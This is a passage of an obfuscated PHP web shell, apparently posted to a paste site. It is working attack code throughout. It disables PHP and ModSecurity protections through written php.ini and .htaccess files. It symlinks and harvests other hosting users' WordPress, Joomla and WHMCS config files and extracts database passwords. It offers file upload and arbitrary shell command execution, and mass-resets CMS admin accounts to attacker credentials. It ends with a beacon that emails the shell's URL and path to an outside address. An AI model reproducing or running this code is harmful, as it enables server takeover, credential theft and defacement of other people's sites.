- SecFilterCheckURLEncoding Off
- SecFilterCheckCookieFormat Off
- SecFilterCheckUnicodeEncoding Off
- SecFilterNormalizeCookies Off
- </IfModule>
- SetEnv PHPRC " . $x83() . $x30 . "/php.ini
- suPHP_ConfigPath " . $x83() . $x30 . "/php.ini");
- $x7a($x2f);
- if ($x86($x83() . $x30 . "/.htaccess")) {
- echo "<Span style='color:green;'><strong>.htaccess Created successfully</strong></span><br>";
- } else {
- echo "<strong><Span style='color:red;'>I can not create .htaccess</strong></span><br>";
- };
- }
- function x0c() {
- global $x73, $x74, $x75, $x76, $x77, $x78, $x79, $x7a, $x7b, $x7c, $x7d, $x7e, $x7f, $x80, $x81, $x82, $x83, $x84, $x85, $x86, $x87, $x88, $x89, $x8a, $x8b, $x8c, $x8d, $x8e, $x8f, $x90, $x91, $x92, $x93, $x94, $x95, $x96, $x97;
- $x31 = $x80($x83() . $x30 . "/php.ini", "w");
- $x81($x31, "safe_mode = Off
- disable_functions = NONE
- safe_mode_gid = OFF
- open_basedir = OFF");
- $x7a($x31);
- if ($x86($x83() . $x30 . "/php.ini")) {
- echo "<strong><Span style='color:green;'>php.ini Created successfully</strong></span><br>";
- } else {
- echo "<strong><Span style='color:red;'>I can not create php.ini</strong></span><br>";
- };
- }
- function x0d() {
- global $x73, $x74, $x75, $x76, $x77, $x78, $x79, $x7a, $x7b, $x7c, $x7d, $x7e, $x7f, $x80, $x81, $x82, $x83, $x84, $x85, $x86, $x87, $x88, $x89, $x8a, $x8b, $x8c, $x8d, $x8e, $x8f, $x90, $x91, $x92, $x93, $x94, $x95, $x96, $x97;
- $x32 = $x80($x83() . $x30 . "/ini.php", "w");
- $x81($x32, '$x84("safe_mode");
- $x84("open_basedir");');
- $x7a($x32);
- if ($x86($x83() . $x30 . "/ini.php")) {
- echo "<strong><Span style='color:green;'>ini.php Created successfully</strong></span><br>";
- } else {
- echo "<strong><Span style='color:red;'>I can not create ini.php</strong></span><br>";
- };
- }
- ////Config Killer
- if ($_REQUEST['tool'] == "Config Killer") {
- echo "<br><center><h6>Config Grabber</h6>"; ?></center><br><center><?php if (empty($_POST['config'])) { ?><p><font face="Tahoma" color="#007700" size="2pt"></p><br><form method="POST"><textarea name="passwd" class='area' rows='15' cols='60'><?php echo $x7b('/etc/passwd'); ?></textarea><br><br><input name="config" class='inputzbut' size="100" value="GET Config" type="submit"><br></form></center><br><?php
- }
- if ($_POST['config']) {
- $x33 = $x34 = @$x85("disable_functions");
- if ($x77("symlink", $x34)) {
- die('<error>Symlink is disabled :( </error>');
- }
- @$x88('mad-tiger', 0755);
- @$x74('mad-tiger');
- $x2f = "
- OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI
- Options Indexes FollowSymLinks
- ForceType text/plain
- AddType text/plain .php
- AddType text/plain .html
- AddType text/html .shtml
- AddType txt .php
- AddHandler server-parsed .php
- AddHandler txt .php
- AddHandler txt .html
- AddHandler txt .shtml
- Options All
- Options All";
- $x7c(".htaccess", $x2f, FILE_APPEND);
- $x35 = $_POST["passwd"];
- $x35 = $x79("
- ", $x35);
- echo "<br><br><center><font color=#b0b000 size=2pt>Loading.....</center><br>";
- foreach ($x35 as $x36) {
- $x37 = $x79(":", $x36);
- $x38 = $x37[0];
- @$x95('/home/' . $x38 . '/public_html/wp-config.php', $x38 . '-wp13.txt');
- @$x95('/home/' . $x38 . '/public_html/wp/wp-config.php', $x38 . '-wp13-wp.txt');
- @$x95('/home/' . $x38 . '/public_html/WP/wp-config.php', $x38 . '-wp13-WP.txt');
- @$x95('/home/' . $x38 . '/public_html/wp/beta/wp-config.php', $x38 . '-wp13-wp-beta.txt');
- @$x95('/home/' . $x38 . '/public_html/beta/wp-config.php', $x38 . '-wp13-beta.txt');
- @$x95('/home/' . $x38 . '/public_html/press/wp-config.php', $x38 . '-wp13-press.txt');
- @$x95('/home/' . $x38 . '/public_html/wordpress/wp-config.php', $x38 . '-wp13-wordpress.txt');
- @$x95('/home/' . $x38 . '/public_html/Wordpress/wp-config.php', $x38 . '-wp13-Wordpress.txt');
- @$x95('/home/' . $x38 . '/public_html/blog/wp-config.php', $x38 . '-wp13-Wordpress.txt');
- @$x95('/home/' . $x38 . '/public_html/config.php', $x38 . '-configgg.txt');
- @$x95('/home/' . $x38 . '/public_html/news/wp-config.php', $x38 . '-wp13-news.txt');
- @$x95('/home/' . $x38 . '/public_html/new/wp-config.php', $x38 . '-wp13-new.txt');
- @$x95('/home/' . $x38 . '/public_html/blog/wp-config.php', $x38 . '-wp-blog.txt');
- @$x95('/home/' . $x38 . '/public_html/beta/wp-config.php', $x38 . '-wp-beta.txt');
- @$x95('/home/' . $x38 . '/public_html/blogs/wp-config.php', $x38 . '-wp-blogs.txt');
- @$x95('/home/' . $x38 . '/public_html/home/wp-config.php', $x38 . '-wp-home.txt');
- @$x95('/home/' . $x38 . '/public_html/db.php', $x38 . '-dbconf.txt');
- @$x95('/home/' . $x38 . '/public_html/site/wp-config.php', $x38 . '-wp-site.txt');
- @$x95('/home/' . $x38 . '/public_html/main/wp-config.php', $x38 . '-wp-main.txt');
- @$x95('/home/' . $x38 . '/public_html/configuration.php', $x38 . '-wp-test.txt');
- @$x95('/home/' . $x38 . '/public_html/joomla/configuration.php', $x38 . '-joomla2.txt');
- @$x95('/home/' . $x38 . '/public_html/portal/configuration.php', $x38 . '-joomla-protal.txt');
- @$x95('/home/' . $x38 . '/public_html/joo/configuration.php', $x38 . '-joo.txt');
- @$x95('/home/' . $x38 . '/public_html/cms/configuration.php', $x38 . '-joomla-cms.txt');
- @$x95('/home/' . $x38 . '/public_html/site/configuration.php', $x38 . '-joomla-site.txt');
- @$x95('/home/' . $x38 . '/public_html/main/configuration.php', $x38 . '-joomla-main.txt');
- @$x95('/home/' . $x38 . '/public_html/news/configuration.php', $x38 . '-joomla-news.txt');
- @$x95('/home/' . $x38 . '/public_html/new/configuration.php', $x38 . '-joomla-new.txt');
- @$x95('/home/' . $x38 . '/public_html/home/configuration.php', $x38 . '-joomla-home.txt');
- @$x95('/home/' . $x38 . '/public_html/vb/includes/config.php', $x38 . '-vb-config.txt');
- @$x95('/home/' . $x38 . '/public_html/whm/configuration.php', $x38 . '-whm15.txt');
- @$x95('/home/' . $x38 . '/public_html/central/configuration.php', $x38 . '-whm-central.txt');
- @$x95('/home/' . $x38 . '/public_html/whm/whmcs/configuration.php', $x38 . '-whm-whmcs.txt');
- @$x95('/home/' . $x38 . '/public_html/whm/WHMCS/configuration.php', $x38 . '-whm-WHMCS.txt');
- @$x95('/home/' . $x38 . '/public_html/whmc/WHM/configuration.php', $x38 . '-whmc-WHM.txt');
- @$x95('/home/' . $x38 . '/public_html/whmcs/configuration.php', $x38 . '-whmcs.txt');
- @$x95('/home/' . $x38 . '/public_html/support/configuration.php', $x38 . '-support.txt');
- @$x95('/home/' . $x38 . '/public_html/configuration.php', $x38 . '-joomla.txt');
- @$x95('/home/' . $x38 . '/public_html/submitticket.php', $x38 . '-whmcs2.txt');
- @$x95('/home/' . $x38 . '/public_html/whm/configuration.php', $x38 . '-whm.txt');
- }
- echo '<b class="cone"><font face="Tahoma" color="#00dd00" size="2pt"><b>[Grabbered] -></b> <a target="_blank" href="mad-tiger">Open configs</a></font></b>';
- }
- }
- ////Symlink
- if ($_REQUEST['tool'] == "Symlink") {
- echo "<h6>Symlink Bypass </h6>";
- echo '<form action="" method="post">';
- @$x92(0);
- echo "<center>";
- @$x88('mad-tiger', 0777);
- $x2f = "Options all
- DirectoryIndex readme.html
- AddType text/plain .php
- AddHandler server-parsed .php
- AddType text/plain .html
- AddHandler txt .html
- Require None
- Satisfy Any";
- $x26 = @$x80('mad-tiger/.htaccess', 'w');
- $x81($x26, $x2f);
- @$x95('/', 'mad-tiger/root');
- $x27 = $x73('index.php');
- $x28 = @$x7d('/etc/named.conf');
- if (!$x28) {
- echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
- } else {
- echo "<br><br><div class='tmp'><table border='1' bordercolor='#FF0000' width='500' cellpadding='1' cellspacing='0'><td>Domains</td><td>Users</td><td>symlink </td>";
- foreach ($x28 as $x29) {
- if ($x77('zone', $x29)) {
- $x8f('#zone "(.*)"#', $x29, $x2a);
- $x7e();
- if ($x94($x97($x2a[1][0])) > 2) {
- $x2b = $x8e(@$x7f('/etc/valiases/' . $x2a[1][0]));
- $x2c = $x2b['name'];
- @$x95('/', 'mad-tiger/root');
- $x2c = $x2a[1][0];
- $x2d = '\.ir';
- $x2e = '\.il';
- $x1e = '\.id';
- $x1f = '\.sg';
- $x20 = '\.edu';
- $x21 = '\.gov';
- $x22 = '\.go';
- $x23 = '\.gob';
- $x24 = '\.mil';
- $x25 = '\.mi';
- if ($x77("$x2d", $x2a[1][0]) or $x77("$x2e", $x2a[1][0]) or $x77("$x1e", $x2a[1][0]) or $x77("$x1f", $x2a[1][0]) or $x77("$x20", $x2a[1][0]) or $x77("$x21", $x2a[1][0]) or $x77("$x22", $x2a[1][0]) or $x77("$x23", $x2a[1][0]) or $x77("$x24", $x2a[1][0]) or $x77("$x25", $x2a[1][0])) {
- $x2c = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>" . $x2a[1][0] . '</div>';
- }
- echo "
- <tr>
- <td>
- <div class='dom'><a target='_blank' href=http://www." . $x2a[1][0] . '/>' . $x2c . ' </a> </div>
- </td>
- <td>
- ' . $x2b['name'] . "
- </td>
- <td>
- <a href='mad-tiger/root/home/" . $x2b['name'] . "/public_html' target='_blank'>Symlink </a>
- </td>
- </tr></div> ";
- }
- }
- }
- }
- echo "</table>";
- }
- ////Jumping
- if ($_REQUEST['tool'] == "Jumping") {
- $x26 = "array_push";
- $x27 = "feof";
- $x28 = "fgets";
- $x29 = "fopen";
- $x2a = "ini_get";
- $x2b = "is_readable";
- $x2c = "set_time_limit";
- $x2d = "strpos";
- $x2e = "substr";
- ($x2f = $x2a('safe_mode') == 0) ? $x2f = 'off' : die('<b>Error: Safe Mode is On</b>');
- $x2c(0);
- @$x30 = $x29('/etc/passwd', 'r');
- if (!$x30) {
- die('<b><font face=Verdana size=2 color=red> Error : Can Not Read Config Of Server </b>');
- }
- $x31 = array();
- $x32 = array();
- $x33 = array();
- $x34 = 0;
- echo "<b><font face=Verdana size=13 color=Teal> </font></b><br />";
- echo "<br />";
- echo "<font face=Verdana size=17 color=green> Ok, Let's Begin ... </font><br />";
- echo "<font face=Verdana size=2 color=Teal>*********************************************</font><br />";
- while (!$x27($x30)) {
- $x35 = $x28($x30);
- if ($x34 > 35) {
- $x36 = $x2d($x35, ':');
- $x37 = $x2e($x35, 0, $x36);
- $x38 = '/home/' . $x37 . '/public_html/';
- if (($x37 != '')) {
- if ($x2b($x38)) {
- $x26($x32, $x37);
- $x26($x31, $x38);
- echo "<font face=Verdana size=2 color=Red>[Found !] $x38</font>";
- echo "<br/>";
- }
- }
- }
- $x34++;
- }
- echo "<font face=Verdana size=2 color=Teal>*********************************************</font><br />";
- echo "<br />";
- echo "<font face=Verdana size=2 color=Maroon>Thanks For Using This Simple Tools. ^_^</font><br />";
- echo "<font face=Verdana size=2></font>";
- echo "<font face=Verdana size=2></font>";
- }
- /////Get Password in Config
- if ($_REQUEST['tool'] == "Pass Config") {
- echo '<form method="post">
- <input type="text" name="conf" value="" />
- <input type="submit" value="GeT Passwords" name="get" />
- </form>';
- $x39 = $_POST['get'];
- $x3a = $_POST['conf'];
- //////////////////////////////////////////////////////////////////////////////////////////////
- if (isset($x39) && $x3a != "") {
- $x3b = @$x7b($x3a);
- //$x8f('#href="(.*?)">(.*?)<#',$x3b,$x3c); // $x3c[2]
- $x8f('#href="(.*?)"#', $x3b, $x3c);
- foreach ($x3c[1] as $x3d) {
- $x3e = $x3a . $x3d;
- $x3f = @$x7b($x3e);
- $x90('#\'DB_PASSWORD\', \'(.*)\'#', $x3f, $x40); // wordpress
- $x90('#password = \'(.*)\'#', $x3f, $x41); // joomla
- $x90('#password\'] = \'(.*)\'#', $x3f, $x42); // vb
- $x90('#db_password = "(.*)"#', $x3f, $x43); // whmcs
- $x90('#db_password = \'(.*)\'#', $x3f, $x43); // whmcs
- $x90('#dbpass = "(.*)"#', $x3f, $x44); //
- $x90('#password = \'(.*)\'#', $x3f, $x45); // connnect.php
- $x90('#dbpasswd = \'(.*)\'#', $x3f, $x46); // phpBB 3.0.x
- $x90('#password_localhost = "(.*)"#', $x3f, $x47); // conexao.php
- $x90('#senha = "(.*)"#', $x3f, $x48); // /_inc/config.inc.php
- if (!empty($x40[1])) {
- echo $x40[1] . "<br>";
- } elseif (!empty($x41[1])) {
- echo $x41[1] . "<br>";
- } elseif (!empty($x42[1])) {
- echo $x42[1] . "<br>";
- } elseif (!empty($x43[1])) {
- echo $x43[1] . "<br>";
- } elseif (!empty($x44[1])) {
- echo $x44[1] . "<br>";
- } elseif (!empty($x45[1])) {
- echo $x45[1] . "<br>";
- } elseif (!empty($x49[1])) {
- echo $x49[1] . "<br>";
- } elseif (!empty($x46[1])) {
- echo $x46[1] . "<br>";
- } elseif (!empty($x47[1])) {
- echo $x47[1] . "<br>";
- } elseif (!empty($x48[1])) {
- echo $x48[1] . "<br>";
- }
- }
- }
- }
- /////upload
- if ($_REQUEST['tool'] == "Upload") {
- echo "<br><br><form method=post enctype=multipart/form-data>";
- echo "<input type=file name=f><input name=v type=submit id=v value=up><br>";
- if ($_POST["v"] == up) {
- if (@$x75($x4a["f"]["tmp_name"], $x4a["f"]["name"])) {
- echo "<h3><b>Uploaded Done</b>-->" . $x4a["f"]["name"] . "</h3>";
- } else {
- echo "<b>Not Uploaded";
- }
- }
- }
- //////Execute
- if ($_REQUEST['tool'] == "Execute") {
- echo '<form method="post">
- <input name="cmd" />
- <input type="submit" name="go" />
- </form>';
- if ($_POST['go']) {
- $x4b = $x82("system");
- $x4c = $x82("passthru");
- $x4d = $x82("shell_exec");
- if ($x4b) {
- echo "<textarea readonly='' cols='90'rows='20'>";
- echo $x96($_POST['cmd']);
- echo '</textarea>';
- }
- if (!$x4b & $x4c) {
- echo "<textarea readonly='' cols='90'rows='20'>";
- echo passthrsu($_POST['cmd']);
- echo '</textarea>';
- }
- if (!$x4b & !$x4c & $x4d) {
- echo "<textarea readonly='' cols='90'rows='20'>";
- echo $x93($_POST['cmd']);
- echo '</textarea>';
- }
- }
- }
- //// Symlink2
- if ($_REQUEST['tool'] == "Symlink2") {
- echo '
- <FORM ACTION="#" METHOD="POST">
- <br>
- <br>
- <center> <font size="2" face="MV Boli" color=rgba(82, 168, 236, 0.8) >File :</font> <INPUT TYPE="text" NAME="user" SIZE=60><INPUT TYPE="submit" VALUE="Sym"> </center>
- </FORM>';
- $x4e = $_POST["user"];
- $x4f = '' . $x91() . '.txt';
- if ($x4e) {
- $x50 = $x91();
- @$x88($x50);
- $x51 = $x50 . "/.htaccess";
- $x52 = $x80($x51, 'w') or die("Error: Can't open file");
- $x53 = 'Options +Indexes
- ReadMeName ' . $x4f;
- $x81($x52, $x53);
- $x7a($x52);
- $x74($x50);
- $x95($x4e, $x4f);
- $x74("../");
- echo "<center><iframe height ='500px' width='100%' src=" . $x50 . "></iframe></center>";
- }
- }
- /////About
- if ($_REQUEST['tool'] == "About") {
- echo '
- <img src="https://c1.staticflickr.com/7/6222/6285753717_7eb8c11b29_b.jpg" width="1120" height="500" />
- <h5> We are BGHH<br>
- </h5>
- ';
- }
- ////Server Info
- if ($_REQUEST['tool'] == "Server Info") {
- function openBaseDir() {
- global $x73, $x74, $x75, $x76, $x77, $x78, $x79, $x7a, $x7b, $x7c, $x7d, $x7e, $x7f, $x80, $x81, $x82, $x83, $x84, $x85, $x86, $x87, $x88, $x89, $x8a, $x8b, $x8c, $x8d, $x8e, $x8f, $x90, $x91, $x92, $x93, $x94, $x95, $x96, $x97;
- $x54 = $x85("open_basedir");
- if (!$x54) {
- $x54 = '<font color="green">OFF</font>';
- } else {
- $x54 = '<font color="red">ON</font>';
- }
- return $x54;
- }
- echo '
- <table width="95%" cellspacing="0" cellpadding="0" class="td1" >
- <td height="100" align="left" class="td1">';
- $x55 = $x73('index.php');
- $x56 = @$x85('safe_mode');
- $x3a = @$x83();
- echo "Server : <font color=green>" . $_SERVER['SERVER_SOFTWARE'] . "</font><br>";
- echo "PHP version : <b><font color=green>" . @$x8d() . "</font></b><br />";
- echo (($x56) ? ("safe_mode : <b><font color=red>ON</font></b>") : ("safe_mode: <b><font color=green>OFF</font></b>"));
- echo "<br />disable_functions : ";
- if ('' == ($x57 = @$x85('disable_functions'))) {
- echo "<font color=green>NONE</font></b><br>";
- } else {
- echo "<font color=red>$x57</font></b><br />";
- }
- echo "Open_Basedir: " . openBaseDir() . "<br />";
- echo "Pwd : <font color=green><b>" . $x3a . "</font></b><br />";
- }
- /////Wordpress Mass
- if ($_REQUEST['tool'] == "Wordpress Mass") {
- echo '<form method="post">
- <textarea name="sites" cols="70" rows="12" placeholder="http://www.site.com/sym/wp-config.txt"></textarea><br>
- <input name="change" value="Change" type="submit"/>
- </form>';
- ///////////////////////////////
- $x58 = $_POST['sites'];
- $x59 = $_POST['change'];
- //////////////////////////////////////////////////////////////////////
- if (isset($x59) && $x58 != "") {
- $x5a = $x79("
- ", $x58);
- foreach ($x5a as $x5b) {
- $x5b = $x97($x5b);
- $x3b = @$x7b($x5b);
- if ($x90("#DB_USER#i", $x3b)) {
- $x90("#'DB_HOST', '(.*?)'#i", $x3b, $x5c);
- $x90("#'DB_USER', '(.*?)'#i", $x3b, $x5d);
- $x90("#'DB_PASSWORD', '(.*?)'#i", $x3b, $x5e);
- $x90("#'DB_NAME', '(.*?)'#i", $x3b, $x5f);
- $x90("#table_prefix = '(.*)'#i", $x3b, $x60);
- $x61 = @$x89($x5c[1], $x5d[1], $x5e[1]);
- if ($x61) {
- $x62 = @$x8c($x5f[1], $x61);
- if ($x62) {
- $x63 = @$x8b("UPDATE " . $x60[1] . "users SET `user_login` ='magico' WHERE ID = 1");
- $x63 = @$x8b("UPDATE " . $x60[1] . "users SET `user_pass` ='ad288af4a9ad4a55a9a939e984f23a18' WHERE ID = 1");
- if ($x63) {
- $x64 = @$x8b("SELECT * from " . $x60[1] . "options WHERE option_name='siteurl'");
- $x65 = @$x8a($x64);
- $x66 = $x65["option_value"];
- echo "----------------------------------------------------------------------------------------------------------------------<br>";
- $x90('#http://(.*)/(.*)\.txt#', $x5b, $x3d);
- echo "<span style=\"color: rgb(0, 153, 0); font-weight: bold;\">[#] </span><span style=\"color: rgb(51, 204, 0); font-weight: bold;\">$x3d[2] :</span>" . " " . "[User]= <span style=\"color: rgb(153, 153, 0); font-weight: bold;\">magico </span>[Pass]= <span style=\"color: rgb(153, 153, 0); font-weight: bold;\">xmagico </span>:" . " " . "[site]<span style=\"color: rgb(204, 51, 204); font-weight: bold;\"> <a href=\"$x66/wp-login.php\">$x66/wp-login.php</a></span><br>";
- } //end if
- else {
- $x64 = @$x8b("SELECT * from `wp_options` WHERE option_name='siteurl'");
- $x65 = @$x8a($x64);
- $x66 = $x65["option_value"];
- echo "----------------------------------------------------------------------------------------------------------------------<br>";
- $x90('#http://(.*)/(.*)\.txt#', $x5b, $x3d);
- echo "-----------------------------------------------------------------------------------------------<br>";
- echo "<span style=\"color: red; font-weight: bold;\">[!] $x3d[2] : Error query" . " " . "</span><br>";
- }
- } /*end if*/
- else {
- $x90('#http://(.*)/(.*)\.txt#', $x5b, $x67);
- echo "-----------------------------------------------------------------------------------------------<br>";
- echo "<span style=\"color: red; font-weight: bold;\">[!] $x67[2]: ERRoR query</span><br>";
- }
- } /*end if*/
- else {
- $x90('#http://(.*)/(.*)\.txt#', $x5b, $x68);
- echo "-----------------------------------------------------------------------------------------------<br>";
- echo "<span style=\"color: red; font-weight: bold;\">[!] $x68[2] : [!]can't select the database</span><br>";
- }
- } /*end if*/
- else {
- $x90('#http://(.*)/(.*)\.txt#', $x5b, $x69);
- echo "-----------------------------------------------------------------------------------------------<br>";
- echo "<span style=\"color: red; font-weight: bold;\">[!] $x69[2] : [!]can't connect to the database</span><br>";
- }
- /////////////////////////////////////
- } //end foreach
- } //endif
- }
- //////Joomla Mass
- if ($_REQUEST['tool'] == "Joomla Mass") {
- echo '<form method="post">
- <textarea name="sites" cols="70" rows="12" placeholder="http://www.site.com/sym/jo-config.txt"></textarea><br>
- <input name="change" value="Change" type="submit"/>
- </form>';
- ///////////////////////////////
- $x58 = $_POST['sites'];
- $x59 = $_POST['change'];
- //////////////////////////////////////////////////////////////////////
- if (isset($x59) && $x58 != "") {
- $x5a = $x79("
- ", $x58);
- foreach ($x5a as $x5b) {
- $x5b = $x97($x5b);
- $x3b = @$x7b($x5b);
- if ($x90("#class JConfig#i", $x3b)) {
- $x90('#\$x6a = \'(.*?)\'#i', $x3b, $x5c);
- $x90('#\$x38 = \'(.*?)\'#i', $x3b, $x5d);
- $x90('#\$x6b = \'(.*?)\'#i', $x3b, $x5e);
- $x90('#\$x62 = \'(.*?)\'#i', $x3b, $x5f);
- $x90('#\$x6c = \'(.*?)\'#i', $x3b, $x6c);
- $x90("#fromname = '(.*?)'#i", $x3b, $x6d); // get joomla url
- $x90("#mailfrom = '(.*?)@(.*?)'#i", $x3b, $x6e); //get joomla url
- $x61 = @$x89($x5c[1], $x5d[1], $x5e[1]);
- if ($x61) {
- $x62 = @$x8c($x5f[1], $x61);
- if ($x62) {
- $x63 = @$x8b("UPDATE " . $x6c[1] . "users SET username ='magico' , password = '2a9336f7666f9f474b7a8f67b48de527:DiWqRBR1thTQa2SvBsDqsUENrKOmZtAX'");
- if ($x63) {
- echo "----------------------------------------------------------------------------------------------------------------------<br>";
- $x90('#http://(.*)/(.*)\.txt#', $x5b, $x3d);
- echo "<span style=\"color: rgb(0, 153, 0); font-weight: bold;\">[#] </span><span style=\"color: rgb(51, 204, 0); font-weight: bold;\">$x3d[2] :</span>" . " " . "[User]= <span style=\"color: rgb(153, 153, 0); font-weight: bold;\">magico </span>[Pass]= <span style=\"color: rgb(153, 153, 0); font-weight: bold;\">123456789 </span>:" . " " . "[site]<span style=\"color: rgb(204, 51, 204); font-weight: bold;\"> <a href=\"http://$x6d[1]/administrator\">$x6d[1] </a></span>.[site]<span style=\"color: rgb(204, 51, 204); font-weight: bold;\"> <a href=\"http://$x6e[2]/administrator\">$x6e[2]</a></span> <br>";
- } //end if
- else {
- echo "----------------------------------------------------------------------------------------------------------------------<br>";
- $x90('#http://(.*)/(.*)\.txt#', $x5b, $x3d);
- echo "-----------------------------------------------------------------------------------------------<br>";
- echo "<span style=\"color: red; font-weight: bold;\">[!] $x3d[2] : Error query" . " " . "</span><br>";
- }
- } /*end if*/
- else {
- $x90('#http://(.*)/(.*)\.txt#', $x5b, $x67);
- echo "-----------------------------------------------------------------------------------------------<br>";
- echo "<span style=\"color: red; font-weight: bold;\">[!] $x67[2]: ERRoR query</span><br>";
- }
- } /*end if*/
- else {
- $x90('#http://(.*)/(.*)\.txt#', $x5b, $x68);
- echo "-----------------------------------------------------------------------------------------------<br>";
- echo "<span style=\"color: red; font-weight: bold;\">[!] $x68[2] : [!]can't select the database</span><br>";
- }
- } /*end if*/
- else {
- $x90('#http://(.*)/(.*)\.txt#', $x5b, $x69);
- echo "-----------------------------------------------------------------------------------------------<br>";
- echo "<span style=\"color: red; font-weight: bold;\">[!] $x69[2] : [!]can't connect to the database</span><br>";
- }
- /////////////////////////////////////
- } //end foreach
- } //endif
- }
- $x5b = "www.google.com";
- if (!$x78($x5b, $_SERVER['SERVER_NAME'])) {
- $x6f = "khayrollima@gmail.com";
- $x29 = "hacked";
- $x70 = "from: hacked <google.iq@list.ru>";
- $x71 = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "
- ";
- $x71.= "Path : " . __file__;
- $x72 = @$x87($x6f, $x29, $x71, $x70);
- echo "";
- exit;
- }
- ?>
Add Comment
Please, Sign In to add comment